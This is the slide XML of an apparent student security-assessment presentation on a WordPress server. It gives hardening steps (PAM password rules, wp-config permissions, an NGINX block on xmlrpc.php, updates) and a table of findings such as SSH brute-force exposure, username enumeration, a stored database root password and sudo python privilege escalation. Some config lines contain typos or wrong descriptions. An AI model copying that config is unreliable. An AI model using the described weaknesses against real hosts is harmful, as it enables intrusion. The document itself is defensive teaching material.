                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add password requisites such as:</a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488156" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ucredit=-1 (at least 1 uppercase letter) dcredit=-1 (at least 1 lowercase letter) ocredit=-1 (at least 1 special or other character) </a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1635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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Google Shape;493;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081538" y="8120850"/>
            <a:ext cx="8353425" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9381575" y="3829050"/>
            <a:ext cx="7753350" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Google Shape;495;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8543373" y="12254550"/>
            <a:ext cx="9429750" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609161" y="9361375"/>
            <a:ext cx="5280516" cy="3960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Implementing Patches - The “Other” Way</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p6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03" name="Google Shape;503;p65"/>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25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>continued editing for /etc/pam.d/common-password</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minclass=2 (or 3) can be added to set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minimum number of required classes of characters (upper,lower,or special)</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password		requisite 			pam_pwqality.so retry=3 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minclass=2 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also for added security, to make sure that the same password (at least going back by 5) is not reused you can edit the line</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password		[success=2 default=ignore]		pam_unix.so obscure use_authok try_first_pass sha512</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> remember=5</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now let's change the the permissions of the wp_config file to root user to minimize it’s access and corruptions</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod 700 /var/www/html/wordpress/wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="160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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="44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Implementing Patches - The “Other” Way</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p6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10" name="Google Shape;510;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="1761350"/>
            <a:ext cx="22942800" cy="11739600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not forget to m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>odify the NGINX configuration files in the WordPress theme’s functions.php file to prevent the wpscan.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block XMLRPC:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location ^~ /xmlrpc.php {</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		deny all;</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		error_page 403 =404 / ;</a:t>
            </a:r>
            <a:endParaRPr sz="4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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>							}</a:t>
            </a:r>
            <a:endParaRPr sz="4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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best way to make sure that you’ve got the most current patches is to...</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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4500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ALWAYS REMEMBER TO REGULARLY UPDATE ALL SOFTWARE!!</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="45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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt-get update</a:t>
            </a:r>
            <a:endParaRPr sz="4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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			sudo apt-get upgrade</a:t>
            </a:r>
            <a:endParaRPr sz="4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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s always good to keep your Linux OS up-to-date from time to time!</a:t>
            </a:r>
            <a:endParaRPr sz="4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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			do-release-upgrade -d                                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stay Updated</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … or get hacked</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Google Shape;511;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18281300" y="9138700"/>
            <a:ext cx="5378850" cy="40805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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p2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43" name="Google Shape;143;p22"/>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Our assessment uncovered the following critical vulnerabilities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 name="Google Shape;144;p22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="3234125"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{962B4CB7-2BE8-4553-86C2-8896E5BEEF5F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331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Open access to SSH Port 22</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If SSH (Port 22) is left open, the possibility of a brute-force attack.</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There is no direct impact, however, an attacker can craft an attack method via open SSH port. ie brute force attack and or SSH Metasploit.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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Enumerate usernames in wordpress</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The aim is to identify valid usernames on the system.</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There is no direct impact, however, an attacker can gather information such as username and determine the approach used in attack.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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User ID susceptible to Brute-force attacks</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(CWE-307)</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The software does not implement sufficient</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measures to prevent multiple failed</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authentication attempts within in a short time</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frame, making it more susceptible to brute</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force attacks.</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This will have a high impact because attacker  will access the network and when this happens, so many dangerous possibilities can happen like creating a back door.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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Root password of the</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 database in the wordpress configuration file</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Database root password was stored in an application configuration file. </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This has a high impact because if threat actor gains access to machine, the password will be easily available and he can quickly gain access to the database</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privilege escalation via sudo python</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(CVE-2006-0151)</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Allows limited local users to gain privileges via</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a Python script.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This is dangerous because an attacker who broke in</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with limited access, can morph and gain admin</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privileges. With that, lots of destructive possibilities</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like root access and ability to create a backdoor will</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>be possible.</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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6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517" name="Google Shape;517;p6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518" name="Google Shape;518;p67"/>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Part III: Network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519" name="Google Shape;519;p67"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part III: Network Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Google Shape;526;p6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27" name="Google Shape;527;p68"/>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528" name="Google Shape;528;p68"/>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Topics Covered:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Google Shape;529;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8" y="3688133"/>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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-196300" y="5962363"/>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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Normal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="8236600"/>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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious Activity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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
